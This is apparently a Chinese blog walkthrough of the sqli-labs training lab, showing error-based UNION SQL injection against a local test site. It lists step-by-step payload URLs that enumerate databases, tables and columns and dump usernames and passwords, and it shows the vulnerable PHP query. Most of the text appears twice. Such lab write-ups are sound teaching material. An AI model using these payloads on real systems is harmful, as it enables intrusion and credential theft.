sqli-labs ---- Less-1 & Less-3 & Less-4
2014-05-30 18:11
495 查看
[地址]: https://github.com/Audi-1/sqli-labs
访问地址http://127.0.0.1/sqli-labs/Less-1/?id=1',
提示"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1"。
UNION注入流程:
获取注入句型
http://127.0.0.1/sqli-labs/Less-1/?id=1'--+
猜解列数
http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 5--+
Unknown column '5' in 'order clause'
http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3--+
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,3--+
获取当前数据库名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select database())--+
获取数据库名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+
获取表名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)--+
获取列名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)--+
获取数据
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+
http://127.0.0.1/sqli-labs/Less-1/?id=\ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' LIMIT 0,1' at line 1
此处的\被不对称的单引号引用。\的作用是转义,主要用于判断输入是否被单个引号(单引号,或双引号)引用。上述结果证明输入被单引号包含。
http://127.0.0.1/sqli-labs/Less-1/?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
此处的1,被两个单引号引用。
http://127.0.0.1/sqli-labs/Less-1/?id=1'2
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' LIMIT 0,1' at line 1
此处的2,被一个单引号引用。
配合LIMIT 0,1' 处的错误信息,我们可以猜测查询语句的句型,大概是:
select * from table_name where id='$id' limit 0,1;
打开对应的源文件,信息如下:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
注: Less-3 与 Less-4 可采用同样的方法,故在此省略.
最后推荐大家看篇帖子: http://stackoverflow.com/questions/5741187/sql-injection-that-gets-around-mysql-real-escape-string112
mysql手工注入
基于单引号的显错注入,在开始之前,复习一下mysql手动注入的知识。访问地址http://127.0.0.1/sqli-labs/Less-1/?id=1',
提示"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1"。
UNION注入流程:
获取注入句型
http://127.0.0.1/sqli-labs/Less-1/?id=1'--+
猜解列数
http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 5--+
Unknown column '5' in 'order clause'
http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3--+
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,3--+
获取当前数据库名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select database())--+
获取数据库名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+
获取表名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)--+
获取列名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)--+
获取数据
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+
猜解查询语句
接下来讨论今天的主体内容。利用显错信息,猜解查询语句.http://127.0.0.1/sqli-labs/Less-1/?id=\ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' LIMIT 0,1' at line 1
此处的\被不对称的单引号引用。\的作用是转义,主要用于判断输入是否被单个引号(单引号,或双引号)引用。上述结果证明输入被单引号包含。
http://127.0.0.1/sqli-labs/Less-1/?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
此处的1,被两个单引号引用。
http://127.0.0.1/sqli-labs/Less-1/?id=1'2
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' LIMIT 0,1' at line 1
此处的2,被一个单引号引用。
配合LIMIT 0,1' 处的错误信息,我们可以猜测查询语句的句型,大概是:
select * from table_name where id='$id' limit 0,1;
打开对应的源文件,信息如下:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
注: Less-3 与 Less-4 可采用同样的方法,故在此省略.
最后推荐大家看篇帖子: http://stackoverflow.com/questions/5741187/sql-injection-that-gets-around-mysql-real-escape-string112
相关文章推荐
- sqli-labs ---- Less-8 & Less-9 & Less-10
- 通过sqli-labs学习sql注入——基础挑战之less11-22
- Sqli-labs less 64
- Sqli-labs less 37
- Sqli-labs less 28a
- Sqli-labs less 29
- sqli-labs ---- Less-2
- Sqli-labs less 25a
- Sqli-labs less 39
- Sqli-labs less 41
- Sqli-labs less 27a
- 通过sqli-labs学习sql注入——进阶挑战之less23-28a
- Sqli-labs less 55
- Sqli-labs less 62
- Sqli-labs less 38
- Sqli-labs less 45
- 通过sqli-labs学习sql注入——基础挑战之less1-10
- Sqli-labs less 48
- Sqli-labs less 33
- Sqli-labs less 26a